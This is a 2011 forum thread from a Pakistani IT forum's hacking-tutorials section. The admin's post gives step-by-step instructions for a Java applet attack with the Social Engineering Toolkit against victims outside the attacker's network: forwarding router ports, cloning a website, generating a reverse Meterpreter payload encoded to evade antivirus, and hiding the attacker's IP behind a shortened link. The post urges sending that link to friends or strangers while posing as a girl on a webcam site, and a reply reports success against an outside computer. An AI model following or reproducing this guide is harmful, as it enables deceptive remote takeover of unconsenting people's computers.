Okara Cantt - Pakistan's Biggest IT Education Forum
Welcome To OkaraCantt - Pakistan's Biggest IT Education Forum. We Hope You Enjoy Your Visit.

You're Currently Viewing Our Forum As A Guest. This Means You Are Limited To Certain Areas Of The Board And There Are Some Features You Can't Use. If You Join Our Community, You'll Be Able To Access Member-Only Sections, And Use Many Member-Only Features Such As Customizing Your Profile, Sending Personal Messages, And Voting In Polls. Registration Is Simple, Fast, And Completely Free.



 
HomeCalendarFAQSearchRegisterLog in

Share | 
 

 [TUT] Backtrack Java Applet Attack OUTSIDE NETWORK [TUT]

Go down 
AuthorMessage
Administrator
ADMIN
ADMIN
avatar

Join date : 2011-04-16
Posts : 75
Points : 8919
Reputation : 5010
Gender : Male
Browser :

PostSubject: [TUT] Backtrack Java Applet Attack OUTSIDE NETWORK [TUT]   Sat Nov 19, 2011 3:12 am

Actual Commands Are Black
Important Stuff Is Red
Things Where You Shouldn't Screw Up Are Blue .
Other Text Is Green
Hey There! Today I Will I Show You How To Preform Java Applet Attack Using Social Engineering Toolkit OUTSIDE Your Network. Many Members Have Requested This So I'll Answer Their Calls.
You'll Need:

- BackTrack

First Thing That We Need To Do Is Forward Some Ports .
Go To Start > Run > Cmd (If You're Using Windows. If Running BackTrack Just Type Ifconfig In Konsole)
Type Ipconfig And Look For Default Gateway .
By Default It Is
- 192.168.1.1
Copy Your Default Gateway In Your Browser And Then Type Admin For Both Username And Password.
Try Finding Something That Says Forwarding Or Virtual Servers. (If You Don't Find It Go To [You must be registered and logged in to see this link.] And Find Instructions To Forward Your Router.)
Then Click Add
-For Port Type In 4444.
-For Ip Type Local Ip Of BackTrack. (Open Konsole And Type Ifconfig )
-Chose Protocol And There You Go.
Now Using The Same Method Forward Ports 443 And 80.
Now For Multiple Routers (ONLY IF ARE BEHIND MULTIPLE ROUTERS, IF YOU AREN'T SKIP THIS STEP) It Gets Difficult. Log In To Your Second Router. Find WAN Settings And Take Note Of Your Other Default Gateway.--> The One Of Your First Router.
Go To Quick Setup Or Something Like That Chose Static Ip And In Ip Fill In Desired Ip (Any Ip That Has First 3 Rows Same As Default Gateway Of Your First Router. Default Gateway Of My First Router Is 192.168.1.1 , So I Can Set Static Ip To Be 192.168.1.50 ) , For Subnet Mask 255.255.255.0 And For Default Gateway 192.168.1.1
For Dns You Need To Log On To Your First Router. Find Primary DNS And Copy-Paste. Finish The Quick Setup. Congratz! You Set Up Your Routers Static Ip. Now We Need To Forward Ports From 1st Router To Static Ip, Then From 2nd Router To Your Local Ip.
Now In The First Router Go To Virtual Servers And Forward The Port To Static Ip You Just Made ( 192.168.1.50 )
And In The Second Router Forward The Ports (4444,443,80) To Your Local Ip.
2# Configuring SET#
Start Backtrack. I Am Using BackTrack 5.
-First We Need To Configure SET . Go To /Pentest/Exploits/Set/Config And Open Set_config File.
-Change AUTO_DETECT=ON To AUTO_DETECT=OFF. And While You're Here Change APACHE_SERVER=OFF To ON. Now Save This.
3# Using Social Engineering Toolkit
-Open Up A New Console. Type:
Cd /Pentest/Exploits/Set/ (And Press Enter Lol)
- Now Type
./Set
This Opens Up Social Engineering Toolkit's Main Menu.
- Now Chose [Size=X-Large]Website Attack Vectors . ( 2 )
- Chose The [Size=X-Large]Java Applet Attack ( 1 )
- Chose [Size=X-Large]Site Clone ( 2 )
Now Since We Set Auto Detect Off It Asks If Our SET Machine Is Not On The Same Ip Address As Our Listener. We Say
- No
It Asks For Ip For Reverse Connection. Open Up Google Chrome Because It's Awesome And Go To [You must be registered and logged in to see this link.]
- Copy That Ip And Paste It. That Is Your External Ip.
Now It Asks For Url To Clone . If You Wanna Trick A Friend You Could Use Anything, He Trusts You. But If You're Using This Online Copy Url Of Some Webcam Site (Like [You must be registered and logged in to see this link.] And Pretend To Be Innocent Girl. So For Example, Here We Type
- [You must be registered and logged in to see this link.]
Chose Payload Which You Want To Generate . That Would Be Reverse Meterpreter .
- 2
Chose Encoder To Bypass Anti Virus. The Best Would Be:
- 16
Earlier We Also Turned Told SET # To Use Apache, So We Need To Minimize SET#, And Click On:
[Color=Black]- Applications>Backtrack>Services>HTTPD>Apache Start
32CD32]]Enter Port For The Listener . Earlier We Forwarded Port
- 4444
Now Metasploit Is Loading. However Lhost Is Set To 0.0.0.0
To Change This Simply Press Enter, And Type:
- Set Lhost (Your Local Ip)
This Is Pretty Much It. Now You Copy Your External Ip And Go To [You must be registered and logged in to see this link.] Or Any Other Shortening Site, Paste Your External Ip (One You Found On [You must be registered and logged in to see this link.] ) And Click Shorten . Send That Link To Your Friends, Beloved Ones, Or Just Some Fat, Bald, Horny Guy On The Internet. It's Your Call!


Last edited by Administrator on Fri Nov 25, 2011 10:21 am; edited 1 time in total
Back to top Go down
http://www.okaracantt.com
Dangerous Hacker
Member
Member
avatar

Join date : 2011-11-22
Posts : 2
Points : 1
Reputation : 0
Gender : Male
Age : 28
Browser :
Location : united state

PostSubject: Re: [TUT] Backtrack Java Applet Attack OUTSIDE NETWORK [TUT]   Wed Nov 23, 2011 9:32 pm

lolxxxxxxxxxxx :(
Back to top Go down
23tg94
Member
Member
avatar

Join date : 2012-03-19
Posts : 1
Points : 1
Reputation : 1
Gender : Male
Age : 26
Browser :
Location : united states

PostSubject: Re: [TUT] Backtrack Java Applet Attack OUTSIDE NETWORK [TUT]   Mon Mar 19, 2012 4:57 am

hi i have been trying this and because of this tutorial i finally got to get it to work. one problem though i can get a connection with an outside computer but as soon as they connect it keeps printing out message file not found then saying they connected then message file not found and so on until it stops after it says exception happened during request from (their Ip address) i have tried looking every where to why this happens and how to fix and i can't find anything if you could help me that would be great thanks
Back to top Go down
Sponsored content




PostSubject: Re: [TUT] Backtrack Java Applet Attack OUTSIDE NETWORK [TUT]   

Back to top Go down
 
[TUT] Backtrack Java Applet Attack OUTSIDE NETWORK [TUT]
Back to top 
Page 1 of 1
 Similar topics
-
» How to Capture Java Applet components using Selenium IDE?
» Automation for Java Applets
» Verify command when used with Java,JUNIT and Eclipse
» opera browser not loading the page using selenium Rc(Java)
» YOUNG FOOTBALLER HAS HEART ATTACK ON PITCH

Permissions in this forum:You cannot reply to topics in this forum
Okara Cantt - Pakistan's Biggest IT Education Forum  :: Hacks, Exploits, and Various Discussions :: Hacking Tutorials-
Jump to:  

Chat Room OKaraCantt.CoM

Create a forum on Forumotion | © phpBB | Free forum support | Contact | Report an abuse | Forumotion.com